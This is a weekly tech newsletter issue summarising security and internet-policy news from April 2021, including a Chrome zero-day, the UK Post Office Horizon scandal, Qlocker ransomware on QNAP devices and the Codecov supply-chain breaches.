#AxisOfEasy 193: Gigantic Mystery Block Of Military IP Addresses Became Active On Inauguration Day


Weekly Axis Of Easy #193


Last Week’s Quote was  “A nation of sheep will beget a government of wolves.” … was Edward R. Murrows, speaking on the rabid MacCarthyism of his day.  Winner was Rai Henderson

This Week’s Quote:  “Most of the greatest evils that man has inflicted upon man have come through people feeling quite certain about something which, in fact, was false”… by???

THE RULES: No searching up the answer, must be posted to the blog – the place to post the answer is at the bottom of the post, in the comments section.

The Prize: First person to post the correct answer gets their next domain or hosting renewal is on us.

 


In this issue:
  • Another Yet Another Chrome Zero-Day
  • Bad auditing software sent UK postal workers to prison
  • USPO running cyber-surveillance operation on social media posts
  • Cyber security legend Dan Kaminsky has died
  • Gigantic mystery block of military IP addresses became active in Janauary
  • Parler is back on the Apple store
  • New bill will ban government from buying location data
  • Ransomware is targeting QNAP devices
  • Victim companies begin to emerge in Codecov supply chain hack
  • Salon 42: Is systems change inevitable?
 
 
Another Yet Another Chrome Zero-Day

Here we go again, stop what you’re doing, go check your Google Chrome and Chromium based browsers (this includes Brave, Microsoft Edge) and check that you’re on the latest version 90.0.4430.85.

This addresses the newest Chrome 0-day flaw which is described simply as a “type confusion” vulnerability but is known to have exploits circulating for it in the wild. It has been assigned CVE-2021-21224.

Read:  https://www.securityweek.com/google-chrome-hit-another-mysterious-zero-day-attack

If this keeps up I’m going to have call the next one “Another Another Yet Another Chrome 0-day.”



Bad auditing software sent UK postal workers to prison

In 1999 the UK post office installed an accounting auditing system called “Horizon,” by Fujitsu. It’s used to track the funds flow and transactions through the national postal system.

It had a “bug” however, in that it kept indicating funds were going missing and that resulted in the criminal prosecution of over 700+ UK postmasters (and postmistresses). Some of these people were actually sentenced to prison.

Turns out,  the software was buggy and wrong, but nobody up the chain of command wanted to admit it. In multiple instances sub-postmasters would even fill in the missing funds with their own money, in a desperate attempt to ward off prosecution. One of them even mortgaged his house to come up with the “missing” funds.

One woman was sent to prison whilst pregnant, another man committed suicide.

A court case in 2019 awarded 55M pounds to over 500 claimants (whose share of the payout after legal fees was…. 12M). The judge on the case found that the innumerable shortfalls in funds were caused by the system itself.

The latest chapter in all this, and why it’s in the news again now, is because a UK court of appeals overturned 39 previous convictions.

Read: https://www.bbc.com/news/business-56718036

And: https://www.theverge.com/2021/4/23/22399721/uk-post-office-software-bug-criminal-convictions-overturned


USPO running cyber-surveillance operation on social media posts

Meanwhile, the US postal service is up to something altogether different: running a covert surveillance program against citizens’ social media activities and sharing their findings with other US government agencies.

These activities are part of an undisclosed program being carried out by the US Postal Inspections Service (USPIS) called the “Internet Covert Operations Program” or iCOP.

A report obtained by Yahoo News was circulated as “law enforcement sensitive” to agencies such as the Department of Homeland Security focusing on the World Wide Rally for Freedom and Democracy protests planned for March 20th.

USPIS agents took screen captures and postings from platforms such as Parler and Telegram which purportedly threatened to incite violence at said events. The report also noted that “No intelligence is available to suggest the legitimacy of these threats” and the article notes that nothing in the screen captures obtained suggests as much, although one of the authors of a post therein was purportedly a member of The Proud Boys.
 
Read: https://news.yahoo.com/the-postal-service-is-running-a-running-a-covert-operations-program-that-monitors-americans-social-media-posts-160022919.html


Cyber security legend Dan Kaminsky has died

Sad news in the world of computer security when the news emerged on Saturday April 24th that Dan Kaminsky, a prolific cyber-security researcher had died. Kaminsky was known for working in secret with DNS vendors in 2008 to address a DNS cache poisoning flaw. While the flaw was known theoretically to exist as early as 1999 (via djbdns’ Dan Bernstein), Kaminsky figured out a way to actively exploit it for BIND. It was because of this discovery that source port randomization was implemented.

He went on to discover numerous flaws including flaws in the SSL protocol and developed a methodology.

A later tweet from his niece attributed his cause-of-death to complications arising from his longtime battle with diabetes.

Read: https://www.circleid.com/posts/20210424-security-researcher-dan-kaminsky-has-died


Gigantic mystery block of military IP addresses became active in January

This was noticed on the NANOG mailing list a few weeks ago and then reported on in the mainstream press over the weekend, and it’s now taking on an air of mystery. An absolutely huge block of IPv4 addresses (basically the entire 11.0.0.0/8 netblock plus others) was assigned to the US Department of Defence and was dormant for decades. It wasn’t even being routed anywhere.

Suddenly (and the timing is being made a focus), on Inauguration Day in the US, the entire block was suddenly assigned to an obscure entity called Global Resources Systems that operates out of a virtual office in a nondescript Florida business park and the entire block (AS8003) is suddenly being announced via BGP.

The day this happened AS8003 contained 56 million IP addresses, making it the 6th largest Autonomous System (AS) in the global routing tables, and it’s only been getting bigger since January, now containing 175M addresses and is The Biggest AS in the world. Larger than the second biggest AS, China Telecom and over 100M more addresses than the next largest US network, Comcast. As of a few days ago, AS8003 is originating nearly 6% of the entire global internet routing table.

If you can imagine me saying this with that really annoying newscaster cadence and timbre… “What is it? Why has it happened, and to what end? We may never know. Stay tuned…”

Read: https://www.kentik.com/blog/the-mystery-of-as8003/

And: https://www.washingtonpost.com/technology/2021/04/24/pentagon-internet-address-mystery/


Parler is back on the Apple store

Apple has announced it’s going to allow Parler back into the App Store, citing improved moderation capabilities in the alternative social media platform. Parler was kicked out of the Apple and Google Play stores in the wake of the Washington DC riots on January 6th, being accused of helping organize the fracas. Amazon AWS also deplatformed the app’s underlying cloud infrastructure.

Then-CEO John Matze was fired about a month later, and then stripped of his founder shares and is now suing the company. He has been replaced by Mark Meckler. Meckler, a veteran of the Tea Party Patriots movement, obviously chosen to placate the progressives.

Read: https://9to5mac.com/2021/04/19/parler-app-store-latest-version-approved/

Just logged in to check if my account is still there, it is, I’m @markjr on Parler if anybody hangs out there. I’m also @stuntpope on Twitter, and on Mastodon.


New bill will ban government from buying location data

US Senator Ron Wyden (D-OR) is at it again, tabling a bipartisan bill with Rand Paul (R-KY) called “The Fourth Amendment is Not For Sale Act” which would bar government and law enforcement agencies from buying location data about US citizens from private data brokers without a court order or a warrant.

We’ve reported previously on how in the US Law Enforcement Agencies can skirt the need for obtaining a warrant to request location data from telcos by simply buying it from the many third-party data brokers that comprise the surveillance capitalism economy.

Under this bill, all that would end:

“Doing business online doesn’t amount to giving the government permission to track your every movement or rifle through the most personal details of your life,” Wyden said in a statement. “There’s no reason information scavenged by data brokers should be treated differently than the same data held by your phone company or email provider. This bill closes that legal loophole and ensures that the government can’t use its credit card to end-run the Fourth Amendment.”

Read: https://www.washingtonexaminer.com/news/bipartisan-senators-call-ban-law-enforcement-buying-user-location-data

Interesting, to note that when I searched via Google to find the issue number of that previous AoE Issue where we reported on this, I got an ad to buy location data from a place called narrative.io which seems to be a multi-sided platform for both buying and selling of personal and location data….
 
 
Ransomware is targeting QNAP devices

There is a Qlocker ransomware strain that is specifically targeting QNAP devices. I know a lot of customers here use those for file servers, backups, and general storage, especially over on Zoneedit which has had native QNAP support for years before we acquired it.

This variant began targeting QNAPs on April 9th and attacks the device by running the 7-zip command line compressor tool and moving all the files into encrypted 7z archives. A ransomware note is left behind in a “README” file that directs the victim to a payment site on a .onion address where they have to pay a 0.01 BTC ransom (about $500+ USD right now) to obtain the archive file password.

Read: https://www.bleepingcomputer.com/news/security/massive-qlocker-ransomware-attack-uses-7zip-to-encrypt-qnap-devices/


Victim companies begin to emerge in Codecov supply chain hack

And the extent of last week’s supply chain hack against Codecov is starting to become known as companies are revealed to have been compromised via the attack.

Password manager Passwordstate and vault manager Hashicorp have disclosed breaches via Codecov compromise.

The Passwordstate one looks pretty bad, given that people use it to store their passwords for everything else. Anybody who upgraded using the compromised version are being advised to reset everything, all stored passwords. Hashicorp, for their part, who makes software tools and infrastructure to manage open source projects had their private GPG key exposed as well as their signing infrastructure for downloads.

This is probably just the tip of the iceberg and will be a slow motion train wreck, à la Solarwinds, for weeks to come.

Read: https://www.bleepingcomputer.com/news/security/hashicorp-is-the-latest-victim-of-codecov-supply-chain-attack/

And: https://www.bleepingcomputer.com/news/security/passwordstate-password-manager-hacked-in-supply-chain-attack/


Salon 42: Is systems change inevitable?

We had to skip a salon that was scheduled for the prior week (DDoS attacks against URL forwarding) so Charles, Jesse and I reconvened last week to explore whether some kind of complete system change is inevitable, desirable or even possible, which ties together a few themes each of us were exploring recently:

 
View: https://axisofeasy.com/podcast/salon-42-is-system-change-likely-possible-or-inevitable/

Leave a Reply

Your email address will not be published. Required fields are marked *